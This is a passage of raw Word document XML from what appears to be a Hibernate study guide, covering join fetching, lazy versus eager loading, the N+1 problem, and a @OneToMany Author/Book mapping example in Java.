      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can specify fetching strategies in your query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1BD92"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Join Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08327CFC"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT o FROM Order o JOIN FETCH o.orderDetails WHERE o.id = :id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1753D"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This query will use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load the orderDetails immediately with the Order entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B66A6" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Fetching Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690DBEB3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lazy Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Related entities are loaded when accessed, improving performance by not fetching unnecessary data upfront.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59D568"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eager Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Related entities are loaded immediately, reducing the number of database queries but potentially affecting performance if too much data is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CE4B3" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE92C6"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lazy fetching avoids unnecessary loading but may result in multiple queries (N+1 problem), while eager fetching reduces the number of queries but may retrieve more data than needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C119769"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>N+1 Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If lazy fetching is used improperly (e.g., accessing related entities inside loops), it may result in many unnecessary queries. This can be mitigated by using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN FETCH</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in queries or using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eager loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA7D0D" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both strategies have their use cases, and it's important to choose based on the performance requirements of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B7F2B" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A176B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="437B3991">
          <v:rect id="_x0000_i2468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DEA98" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="00CE4B95" w:rsidRDefault="0099012D" w:rsidP="0099012D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="563" w:name="_Toc196308043"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is OneToMany mapping?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:p w14:paraId="10E07FE4" w14:textId="0EE99A8C" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Hibernate, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToMany</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mapping is used to define a one-to-many relationship between two entities. This means that one entity (the "one" side) is associated with multiple instances of another entity (the "many" side). It is commonly used when you want to represent a situation where one record in a table can be related to multiple records in another table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97068D" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: @OneToMany Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE315F5"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 xml:space="preserve">Consider an example where we have two entities: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Author</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Book</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. An author can write many books, but each book is written by one author. This is a typical one-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE1D77" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D2051"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entity on the "One" side (Author)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Author class will have a one-to-many relationship with the Book class. In this case, an Author can have multiple books.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDA536"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entity on the "Many" side (Book)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Book class will have a reference to the Author class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17BDAB" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD413AC" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Author Entity (One side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603A36B"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import javax.persistence.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A13C54"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import java.util.Set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894310B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582A3442"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623A9D5"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public class Author {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013732C4"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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA32946"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 xml:space="preserve">    @Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37733261"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 xml:space="preserve">    @GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59609146"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 xml:space="preserve">    private Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B202B1" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101E3F75"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 xml:space="preserve">    private String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73752858" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7099A4B0"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 xml:space="preserve">    // One author can have multiple books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FE35B"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 xml:space="preserve">    @OneToMany(mappedBy = "author", fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1F7CC"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 xml:space="preserve">    private Set&lt;Book&gt; books;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C0981" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A55CC6"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 xml:space="preserve">    // Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE50523"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02F2C6" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Book Entity (Many side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F284E5A"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import javax.persistence.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5852A3EB" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75674450"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B49804"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public class Book {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C389B1B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A349DA"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 xml:space="preserve">    @Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D551161"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 xml:space="preserve">    @GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03888045"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 xml:space="preserve">    private Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD9C3A" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4F29A5"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 xml:space="preserve">    private String title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FD9136" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB8783E"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 xml:space="preserve">    // Many books belong to one author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9C222"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 xml:space="preserve">    @ManyToOne(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC96380"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 xml:space="preserve">    @JoinColumn(name = "author_id")  // The foreign key column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAF47A"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 xml:space="preserve">    private Author author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581B107" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B714909"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 xml:space="preserve">    // Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740BC2E5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240C94D" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A773710"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToMany</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on the "one" side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A881B1D" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mappedBy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This attribute is used to specify the field in the "many" side that owns the relationship. In this case, the author field in the Book class owns the relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284D7C7" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fetch = FetchType.LAZY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
